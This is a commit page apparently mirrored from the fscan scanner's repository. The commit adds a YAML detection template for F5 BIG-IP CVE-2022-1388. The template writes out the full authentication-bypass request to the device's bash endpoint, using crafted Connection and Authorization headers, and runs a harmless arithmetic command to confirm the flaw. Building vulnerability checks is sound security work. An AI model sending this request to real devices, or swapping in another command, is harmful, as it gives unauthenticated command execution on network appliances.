mirror of https://github.com/qwqdanchun/fscan.git
Merge pull request #174 from jindaxia/main
poc: add f5 big-ip cve-2022-1388 poc
This commit is contained in:
commit
cf9389e879
|
@ -0,0 +1,21 @@
|
|||
name: poc-yaml-f5-cve-2022-1388
|
||||
set:
|
||||
r1: randomInt(800000000, 1000000000)
|
||||
r2: randomInt(800000000, 1000000000)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /mgmt/tm/util/bash
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
Connection: keep-alive, x-F5-Auth-Token
|
||||
X-F5-Auth-Token: a
|
||||
Authorization: Basic YWRtaW46
|
||||
body: >-
|
||||
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
||||
detail:
|
||||
author: jindaxia
|
||||
links:
|
||||
- https://support.f5.com/csp/article/K23605346
|
Loading…
Reference in New Issue